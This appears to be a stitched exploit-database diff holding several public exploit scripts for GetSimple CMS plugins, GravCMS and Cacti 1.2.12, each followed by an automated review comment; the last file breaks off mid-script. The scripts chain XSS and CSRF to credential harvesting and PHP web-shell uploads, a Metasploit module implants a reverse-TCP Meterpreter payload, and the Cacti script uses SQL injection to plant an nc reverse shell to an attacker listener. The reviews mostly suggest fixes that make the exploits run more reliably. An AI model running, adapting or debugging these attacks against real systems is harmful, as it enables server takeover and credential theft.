# GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 # via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
# Exploit Description:
# This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation # attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
# Attack Chain:
# 1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
# 2. Admin then enters their credentials into the GetSimple CMS login portal
# 3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
# 4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
# 5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
# 6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
# 7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
# 8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
import sys,re,argparse,requests
from urllib.parse import quote
from colorama import (Fore as F, Back as B, Style as S)
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
def webshell(SERVER_URL):
try:
WEB_SHELL = SERVER_URL
getdir = {'FierceGodKick': 'echo %CD%'}
r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
status = r.status_code
cwd = re.findall(r'[CDEF].*', r.text)
if cwd:
cwd = cwd[0]+"> "
term = SB+FG+cwd+FT
print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+' WELCOME BOKU '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
while True:
thought = input(term)
command = {'FierceGodKick': thought}
r = requests.post(WEB_SHELL, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
else:
r.raise_for_status()
except:
pass
def urlEncode(javascript):
return quote(javascript)
def genXssPayload():
XSS_PAYLOAD = '/index/javascript:'
XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
XSS_PAYLOAD += 'r=this.responseXML;'
XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
XSS_PAYLOAD += 'xhr3.send(params);'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
XSS_PAYLOAD += 'xhr2.responseType="document";'
XSS_PAYLOAD += 'xhr2.send();'
XSS_PAYLOAD += '}};'
XSS_PAYLOAD += 'xhr1.send(params);'
XSS_PAYLOAD += '%2f%2f'
return XSS_PAYLOAD
def argsetup():
about = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink, which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
args = parser.parse_args()
return args
if __name__ == "__main__":
print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
print(SB+FR+' CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
args = argsetup()
RHOST = args.TargetSite
WEBAPP_URL = RHOST+'/admin/'
WEBAPP_URL = WEBAPP_URL+'index.php'
PAYLOAD = genXssPayload()
ENCODED_PAYLOAD = urlEncode(PAYLOAD)
print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
sleep(1)
print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
while True:
sleep(1)
webshell(RHOST)
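Review bot: `bullet` on L2135-L2137 computes `C` from the colour argument and then ignores it, hard-coding `FB` in the return expression, so `err` and `ok` render in the same colour as `info`; use `C` there. `webshell` on L2139-L2162 wraps everything in a bare `except: pass`, and the loop on L2220-L2222 calls it once a second with no upper bound, so a mistyped target, a TLS error or a non-Windows host (the `[CDEF].*` regex on L2145 only matches drive-letter paths) all fail silently forever; catch `requests.RequestException`, set a timeout on the posts, and report why a poll failed. `verify=False` on L2143 and L2153 also leaves the urllib3 InsecureRequestWarning firing on every poll. Inside `genXssPayload`, `params`, `r`, `nVal`, `eVal` and `payload` are assigned without `var` (L2179, L2184-L2186, L2189-L2190), which works only in sloppy mode and deserves a comment. From the vendor side, the description on L2118 and the chain on L2121-L2129 show the login page reflecting the URL path into the page; encoding that value for its attribute context removes the injection point, and the nonce fetched on step 5 offers no protection once script runs in the admin origin, which is exactly the point the chain makes.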

exploits/php/webapps/49774.py Executable file

@ -0,0 +1,158 @@
# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: 15/04/2021
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221
# Vendor: NetExplorer
# Version: <= v1.1.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox
# About My SMTP Contact Plugin:
# An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugins configuration page within the admin console, and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email.
# CSRF Vulnerability Information:
# The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Version of the My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021, and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token.
# PHP Code Injection Vulnerability Information:
# When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admins user input into PHP code files. These user supplied values are injected into PHP strings which use double quotes. Some features of PHP double quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions; resulting in code execution. The method in this proof of concept also overcomes the developers attempt to sanitize the user input by using htmlspecialchars() which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue, would be to inject the user supplied input into single quote strings, versus the double quote strings. As single quote strings do not permit variable expansion and complex expression evaluation.
# Exploit Description:
# The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(author)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
def generateCsrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_email_to" value="boku@0xboku">'
payload += '<input type="hidden" name="m_smtp_c_smtp_or_standard" value="standard">'
payload += '<input type="hidden" name="m_smtp_c_digital_captcha" value="on">'
payload += '<input type="hidden" name="m_smtp_c_digitSalt" value="TLGfUrl3TyiaxOKwrg5d0exfBYKbHDwR">'
payload += '<input type="hidden" name="m_smtp_c_agree_checkbox" value="on">'
payload += '<input type="hidden" name="m_smtp_c_client_server" value="client_server">'
payload += '<input type="hidden" name="m_smtp_c_window_msg" value="on">'
payload += '<input type="hidden" name="m_smtp_c_default_css" value="on">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="boku">'
payload += '<input type="hidden" name="m_smtp_c_subject" value="RCE">'
payload += '<input type="hidden" name="m_smtp_c_email_from" value="boku@0xboku">'
payload += '<input type="hidden" name="m_smtp_c_email_from_password" value="password123">'
payload += '<input type="hidden" name="m_smtp_c_email_from_ssl" value="ssl://smtp.0xboku">'
payload += '<input type="hidden" name="m_smtp_c_email_from_port" value="777">'
payload += '<input type="hidden" name="m_smtp_c_standard_email_from" value="boku@0xboku">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="62605e65e25ab30">'
payload += '<input type="hidden" name="my_smtp_c_selected_name" value="asd">'
payload += '<input type="hidden" name="m_smtp_c_alternative_fields" value="off">'
payload += '<input type="hidden" name="m_smtp_c_qty_fields" value="1">'
payload += '<input type="hidden" name="m_smtp_c_limit_file_size" value="1">'
payload += '<input type="hidden" name="m_smtp_c_valid_file_format" value="jpeg">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name[]" value="User name">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name_ok[]" value="ok">'
payload += '<input type="hidden" name="m_smtp_c_arr_tags_Name[]" value="0">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Required[]" value="required">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Type[]" value="text">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Maxlength[]" value="50">'
payload += '<input type="hidden" name="m_smtp_c_arr_fields_Code[]" value="{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(generateCsrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
banner = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB,FR,ST)
print(banner)
print('Listening for Victims to connect..')
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
# Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell
def tryUploadWebshell(target,contact):
try:
blind = target+contact
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def argsetup():
about = SB+FT+'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. '
about += FR+'CVSS Base Score: 9.6 | '
about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+ST
parser = argparse.ArgumentParser(description=about)
parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
parser.add_argument('SMTPContactPage',type=str,help='The path to the public page which implements the SMTP Contact form - Used for blind RCE')
args = parser.parse_args()
return args
if __name__ == '__main__':
args = argsetup()
target = args.TargetSite
contact = args.SMTPContactPage
threadshed = theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,contact)
sleep(2)
pwnt = checkWebshell(target)
print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok))
webshell(target)
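Review bot: `class S(BaseHTTPRequestHandler)` on L2318 shadows the `S` imported as `Style` on L2250; it only works because `ST`, `SD` and `SB` were unpacked on L2253 before the class body runs, so rename the handler. `do_GET` on L2319-L2323 writes the body without `send_response(200)`, a `Content-Type` header and `end_headers()`, so the reply carries no status line or headers; most clients will not render it as a page. L2316 closes the form with `<body>` instead of `</body>`. `generateCsrfPayload` reads the module-level `target` that is only assigned inside `__main__` on L2364; pass it as a parameter. The poll loop on L2368-L2373 re-triggers the blind command every five seconds with no upper bound, and `checkWebshell` returns `None` on any exception (L2351-L2352), which the loop cannot tell apart from a real non-200. On remediation the header already says most of it: v1.1.2 adds the CSRF nonce, and writing the settings into single-quoted PHP strings, or better storing them as data rather than generating PHP source, removes the code-injection sink that the `{$...}` value on L2314 reaches through htmlspecialchars().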

exploits/php/webapps/49788.rb Executable file

@ -0,0 +1,160 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GravCMS Remote Command Execution',
'Description' => %q{
This module exploits arbitrary config write/update vulnerability to achieve remote code execution.
Unauthenticated users can execute a terminal command under the context of the web server user.
Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages.
In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without
needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of
existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability,
an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command
under the context of the web-server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2021-21425'],
['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/']
],
'Privileged' => true,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' =>
{
'payload' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64',
'WfsDelay' => 90
},
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2021-03-29',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
CONFIG_CHANGES # user/config/scheduler.yaml
]
}
)
)
end
def check
# During the fix, developers changed admin-nonce to login-nonce.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin')
)
if res && !res.get_hidden_inputs.first['admin-nonce'].nil?
CheckCode::Appears
else
CheckCode::Safe
end
end
def capture_cookie_token
print_status 'Sending request to the admin path to generate cookie and token'
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin')
)
# Cookie must contain grav-site-az09-admin and admin-nonce form field must contain value
if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ && !res.get_hidden_inputs.first['admin-nonce'].nil?
print_good 'Cookie and CSRF token successfully extracted !'
else
fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token was not found.'
end
@cookie = res.get_cookies
@admin_nonce = res.get_hidden_inputs.first['admin-nonce']
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
end
capture_cookie_token
@task_name = Rex::Text.rand_text_alpha_lower(5)
# Msf PHP payload does not contain quotes for many good reasons. But a single quote will surround PHP binary's
# parameter due to the command execution library of the GravCMS. For that reason, surrounding base64 part of the
# payload with a double quote is necessary to command executed successfully.
payload.encoded.sub! 'base64_decode(', 'base64_decode("'
payload.encoded.sub! '));', '"));'
print_status 'Implanting payload via scheduler feature'
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
'cookie' => @cookie,
'vars_post' => {
'admin-nonce' => @admin_nonce,
'task' => 'SaveDefault',
"data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php',
"data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}",
"data[custom_jobs][#{@task_name}][at]" => '* * * * *',
"data[custom_jobs][#{@task_name}][output]" => '',
"data[status][#{@task_name}]" => 'enabled',
"data[custom_jobs][#{@task_name}][output_mode]" => 'append'
}
)
if res && res.code == 200 && res.body.include?('Successfully saved')
print_good 'Scheduler successfully created ! Wait for 1 minute...'
end
end
def on_new_session
print_status 'Cleaning up the the scheduler...'
# Thanks to the YAML update method, we can remove the command details from the config file just by re-enabling
# the scheduler without any parameter:) It will leave the only command name in the config file.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'),
'cookie' => @cookie,
'vars_post' => {
'admin-nonce' => @admin_nonce,
'task' => 'SaveDefault',
"data[status][#{@task_name}]" => 'enabled'
}
)
if res && res.code == 200 && res.body.include?('Successfully saved')
print_good 'The scheduler config successfully cleaned up!'
end
end
end
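Review bot: `check` and `capture_cookie_token` both index `res.get_hidden_inputs.first['admin-nonce']` without guarding the case where the admin page has no hidden inputs; `first` then returns nil and the `['admin-nonce']` lookup raises NoMethodError instead of yielding `CheckCode::Safe` or the `UnexpectedReply` failure. Suggest `inputs = res.get_hidden_inputs.first` followed by `return CheckCode::Safe unless inputs && inputs['admin-nonce']`. Since `exploit` calls `check` and then `capture_cookie_token`, the same admin page is also fetched twice; the nonce and cookie could be taken from the first response.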

exploits/php/webapps/49810.py Executable file

@ -0,0 +1,92 @@
# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
# Date: 04/28/2021
# Exploit Author: Leonardo Paiva
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
# Version: 1.2.12
# Tested on: Ubuntu 20.04
# CVE : CVE-2020-14295
# Credits: @M4yFly (https://twitter.com/M4yFly)
# References:
# https://github.commandcom/Cacti/cacti/issues/3622
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
#!/usr/bin/python3
import argparse
import requests
import sys
import urllib.parse
from bs4 import BeautifulSoup
# proxies = {'http': 'http://127.0.0.1:8080'}
def login(url, username, password, session):
print("[+] Connecting to the server...")
get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies)
print("[+] Retrieving CSRF token...")
html_content = get_token_request.text
soup = BeautifulSoup(html_content, 'html.parser')
csrf_token = soup.find_all('input')[0].get('value').split(';')[0]
if csrf_token:
print(f"[+] Got CSRF token: {csrf_token}")
print("[+] Trying to log in...")
data = {
'__csrf_magic': csrf_token,
'action': 'login',
'login_username': username,
'login_password': password
}
login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies)
if "Invalid User Name/Password Please Retype" in login_request.text:
print("[-] Unable to log in. Check your credentials")
sys.exit()
else:
print("[+] Successfully logged in!")
else:
print("[-] Unable to retrieve CSRF token!")
sys.exit()
def exploit(lhost, lport, session):
rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-"
exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies)
print("\n[+] SQL Injection:")
print(exploit_request.text)
try:
session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies)
except Exception:
pass
print("[+] Check your nc listener!")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True)
parser.add_argument('-u', metavar='<user>', help='user to log in', required=True)
parser.add_argument('-p', metavar='<password>', help="user's password", required=True)
parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True)
parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True)
args = parser.parse_args()
url = args.t
username = args.u
password = args.p
lhost = args.lhost
lport = args.lport
session = requests.Session()
login(url, username, password, session)
exploit(lhost, lport, session)
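Review bot: the `#!/usr/bin/python3` shebang sits after the comment header (13th line), so it has no effect and the file will not run as `./49810.py`; move it to line 1. `exploit(lhost, lport, session)` also reads `url` as a module global that only exists because the `__main__` block assigns it, rather than taking it as a parameter; pass `url` explicitly so the function works when imported. The reference `https://github.commandcom/Cacti/cacti/issues/3622` has a mangled hostname and should be checked against the real issue URL.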

exploits/php/webapps/49816.py Executable file

@ -0,0 +1,166 @@
# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
# Date: 30/04/201
# Vendor Homepage: http://get-simple.info
# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
# Vendor: 4Enzo
# Version: v0.1
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
# Vulnerability Description:
# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.
# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6
import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep
FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()
def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass
def xhrRcePayload():
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var gt = decodeURIComponent("%3c");'
payload += 'var lt = decodeURIComponent("%3e");'
payload += 'var h="application/x-www-form-urlencoded";'
payload += 'var u="/admin/theme-edit.php";'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 && xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector("#nonce").value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open("POST",u,true);'
payload += 'xhr2.setRequestHeader("Content-Type",h);'
payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);'
payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open("GET",u,true);'
payload += 'xhr1.responseType="document";'
payload += 'xhr1.send();'
return payload
def csrfPayload():
payload = '<html><body>'
payload += '<form action="'+target+'/admin/load.php?id=CustomJSPlugin" method="POST">'
payload += '<input type="hidden" name="customjs_url_content" value="">'
payload += '<input type="hidden" name="customjs_js_content" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="submit" value="Save Settings">'
payload += '<input type="submit" value="Submit request">'
payload += '</form></body></html>'
return payload
class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{}{} connected to Malicious CSRF Site!".format(ok,victim))
print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')
def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass
def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass
def sig():
SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
return SIG
def argsetup():
